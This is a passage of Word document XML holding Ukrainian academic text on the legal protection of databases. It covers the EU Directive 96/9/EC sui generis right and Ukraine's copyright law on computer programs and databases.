    <w:p w14:paraId="370A0A65" w14:textId="54314C6F" w:rsidR="00BA24D7" w:rsidRPr="003B780E" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Причина надання правової охорони бази даних на підставі suigeneris, як стверджує Б. Едельман, є чисто економічною: мета – не охорона нових видів літературних або художніх творів, а захист виключно інвестицій [9]. Відповідно до вказаного правового режиму «suigeneris», упорядник (виробник) бази даних, яка може бути як оригінальною, так і неоригінальною, вправі забороняти вилучення та (чи) повторне використання всього змісту бази даних або її значної частини, і це стосується не тільки виготовлення «контрафактної конкурентної продукції, але й будь-якого користувача, який своїми діями завдає значної шкоди інвестуванню у якісному </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">чи кількісному вимірі» [10]. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Директива ЄС 96/9/ЄС закріпила як основу розвитку національних законодавств ЄС «дворівневу систему» охорони баз даних, де авторське право захищає підбір та розміщення матеріалу, а право «suigeneris» – сукупність та верифікацію тотожності самих даних. Причому останнє має застосовуватися незалежно від охороноздатності бази даних нормами авторського права. Проте зазначене «особливе право» не використовується відносно змісту бази даних, якщо твори, що становлять її зміст, вже охороняються авторським правом або суміжними правами</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [11]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173D868E" w14:textId="19C1F85F" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Слід зазначити, що право suigeneris не включається в галузь регулювання ані звичайних багатосторонніх конвенцій в даній області, ані Угоди ТРІПС. На нього поширюється принцип національного режиму. Відповідно ж до положень ст.11 названої вище Директиви ЄС 96/9/ЄС можливість охорони бази даних, створених в третіх державах, допускається за умови укладення угод з Радою ЄС</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [11] </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5FC277" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Формулюючи право на неоригінальні бази даних як нетипове, особливе, автори Директиви ЄС 96/9/ЄС отримали можливість сконструювати це право «з чистого листа», не пристосовуючи його до будь-якого з відомих інститутів права інтелектуальної власності. Іншими словами, право suigeneris стало вкрай функціональним: воно дає захист тим об’єктам та суб’єктам, яким цей захист потрібен і лише настільки, наскільки – це є економічно доцільно. Функціональний підхід, як слушно зазначила О. А. Іщенко, обумовив і високу ефективність цього інституту: охорона змісту бази даних була співрозмірною, тобто захист отримувало те, що необхідно було захищати і нічого крім цього, і дієвим, адже 80 % розробників баз даних відчули себе «захищеними» цим правом [11].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB410A5" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="003F3D7D" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EF535F" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="005F4EC4" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc516752120"/>
      <w:bookmarkStart w:id="20" w:name="_Toc30433104"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.4 Законодавство</w:t>
      </w:r>
      <w:r w:rsidRPr="005F4EC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> України в галузі  права інтелектуальної власності</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="705E3DA6" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="003F3D7D" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6FF6D9" w14:textId="20738F4B" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Протягом кількох останніх десятків років узагальнене європейське законодавство впливало і на законодавство в галузі права інтелектуальної власності України. Європейські Директиви, зокрема Директива ЄС 96/9/ЄС «Про правовий захист бази даних», досить детально регламентують випадки визнання (відмови у визнанні), а також порядок та обсяг охорони прав інтелектуальної власності. Зазначена Директива є певним вектором для формування та розвитку національних законодавств країн ЄС та інших держав. Проте будь-яких угод між Україною та ЄС не укладено, що дає сьогодні змогу говорити лише про запозичення досвіду застосування Директиви ЄС 96/9/ЄС у законодавстві України. Таким чином, до середини 90-х років XX століття на міжнародному рівні була сформована існуюча нині система правової охорони бази даних</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [12]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645DD240" w14:textId="1F9A32CF" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Досить не врегульованим залишається правовий статус  суб’єктів прав  на базу даних, не надано класифікацію цього об’єкту,  не визначено правову охорону неоригінальних баз даних. Це вказує на необхідність розробки спеціального закону, який би безпосередньо регулював відносини, що виникають з приводу створення, використання та охорони баз даних</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [12]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57BEE8" w14:textId="7FB94FA6" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ситуація значно ускладнюється інтенсивним розвитком глобальних мереж, зокрема – мережі загального доступу Internet, у якій відсутні поняття національних кордонів, а постійне збільшення швидкості комунікацій та інтенсифікація інформаційних процесів призводить до збільшення мобільності матеріальних та інформаційних об’єктів</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [13]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0743CC6F" w14:textId="7F51B16D" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ефективність законів, при створенні яких суттєво використовувалось поняття національних кордонів, поступово знижується. Все більше значення має швидкість фіксації та реєстрації інформаційних об’єктів, які захищаються авторським правом, а також зручність та ефективність маніпулювання такими об’єктами. Зі сказаного витікає, що вже найближчим часом вирішення проблем захисту прав інтелектуальної власності в цій сфері стане нагальною проблемою.        На даний момент правове регулювання відносин у сфері використання комп’ютерних програм та баз даних відбувається на національному й міжнародному рівнях.  На національному рівні таке регулювання забезпечується прийняттям відповідних законів, на міжнародному – укладенням відповідних конвенцій, угод.  У відповідності до підписаної Україною Бернської конвенції про охорону літературних та художніх творів, основною формою охорони комп’ютерних програм і баз даних є авторське право і, таким чином, комп’ютерні програми та бази даних віднесені до категорії об’єктів, що охороняються як літературні твори</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [14]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F06856E" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="007C39A4" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>«Авторське право – в об‘єктивному сенсі – інститут цивільного права, регулюючий відносини, пов‘язані зі створенням та використанням (виданням, виконанням, показом і т.д.) творів науки, літератури або мистецтва, тобто об‘єктивних результатів творчої діяльності людей в цих областях. Програми для ЕОМ та бази даних також охороняються авторським правом. Вони прирівняні до літературних творів та збірок, відповідно</w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[12].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839B543" w14:textId="3F95924A" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Авторські права на програми та бази даних закріплені, як зазначалось вже вище, у Договорі Всесвітньої організації охорони інтелектуальної власності та авторського права,  і підписаній на Дипломатичній конференції 20 грудня 1996 року директиві Європейських Співтовариств про правову охорону комп’ютерних програм та баз даних від 14 травня 1991 року, Угоді Світової організації торгівлі про торговельні аспекти прав інтелектуальної власності (Угода ТРІПС), дотримання положень якої є неодмінною умовою вступу України до COT</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [12]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB9F2F" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00B43CF5" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3246B1BB" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="005F4EC4" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="993"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc516752121"/>
      <w:bookmarkStart w:id="22" w:name="_Toc30433105"/>
      <w:r w:rsidRPr="005F4EC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1.4.1 Закон України « Про авторське та суміжні права»</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="5D1D1CBD" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00B43CF5" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E45547" w14:textId="6F8621F3" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В Україні охорона комп’ютерних програм та баз даних здійснюється відповідно до Закону України «Про авторське та суміжні права», що, в основному, відповідає вимогам міжнародних конвенцій та угод, переважна більшість статей якого безпосередньо стосується  комп’ютерних програм і баз даних. Проблема полягає в тому, що бази даних, на відміну від літературних творів, є об’єктами, що динамічно змінюються. Незмінною в них є лише концептуальна інформаційна модель на основі якої вони побудовані. Що ж стосується наповнення даними зазначеної моделі, то вони постійно змінюються задля підтримки її в актуальному стані</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [13]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A85DBC" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Коли мова йде про літературний твір, то згідно до Закону України «Про охорону прав на винаходи і корисні моделі», захисту підлягає, у першу чергу його зміст. Виникає питання: що захищається, коли мова йде про базу даних?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020C013" w14:textId="3940F908" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Вперше</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> визначення бази даних в Україні було надано Законом «Про авторське право </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та суміжні права» у 1994 році. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В ньому визначення про базу даних дещо відрізняється від вище приведеного. Згідно закону</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> база даних – це сукупність (компіляція даних) – сукупність творів, даних або будь-якої іншої незалежної інформації у довільній формі, в тому числі  електронній, підбір і розташування складових частин якої та її упорядкування є результатом творчої праці, і складові частини якої є доступними індивідуально і можуть бути знайдені за допомогою спеціальної пошукової системи на основі електронних засобів (комп’ютера) чи інших засобів</w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007C39A4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ст.І )</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Стаття 19 закону [13] наголошує, що правова охорона баз даних не поширюється на самі дані або інформацію і не чіпає будь-яке авторське право, що відноситься до самих даних чи інформації, які містяться у базі даних. У статті 5 Договору Всесвітньої організації інтелектуальної власності, як вже зазначалося вище, стверджується, що компіляція даних або будь-якої іншої інформації у будь-якій формі, яка у відповідності до підбору і розміщення, є результатом інтелектуальної творчості, має охоронятись як об’єкт інтелектуальної власності. У даному випадку охорона, знову ж таки, не розповсюджується на первинні данні з бази. Але й право авторства на ці дані не обмежується</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [14]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63757D61" w14:textId="17EB205B" w:rsidR="00BA24D7" w:rsidRPr="00D84A48" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>В тому числі законодавство розрізняє такі поняття, як структура даних та самі дані, що зберігаються у базі. Що стосується захисту самих даних, то закон їх захищає лише у тому випадку, коли вони є об’єктом інтелектуальної творчості. Це той загальний принцип, що міститься у міжнародних документах і є результатом загального світового досвіду, накопиченого у цій сфері. Наприклад, зміст телефонного довідника не є об’єктом, що підлягає захисту, а зміст тлумачного словника – є</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [14]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D57E255" w14:textId="0EFA3DE4" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Той факт, що сучасне українське законодавство (наприклад, [13] та зазначене в [14]), практично ніяк не передбачає захисту інформації, що зберігається у базах даних, не є однозначно негативним фактом. Оформлення авторських прав можливе лише на закінчений об’єкт інтелектуальної діяльності, а інформація у базі даних постійно змінюється. Крім того, до уваги слід брати ще й простоту цього принципу. Але створення структури та інтерфейсу будь - якої бази даних і, головне, наповнення її даними, це робота, що вимагає великих інвестицій та витрат. На жаль, інтелектуальні витрати на заповнення бази даними часто перевищують витрати на їх розробку як таких</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [15]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F92A688" w14:textId="4E6E2686" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D84A48">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>У ряді країн прийняті законодавчі акти, які дають виключне право особі, що виконувала заповнення баз даних, на вилучення та повторне використання інформації, що в ній зберігається. Такий підхід використовують у тому випадку, коли ця особа внесла суттєвий трудовий, фінансовий або інтелектуальний вклад у наповнення бази даних</w:t>
      </w:r>
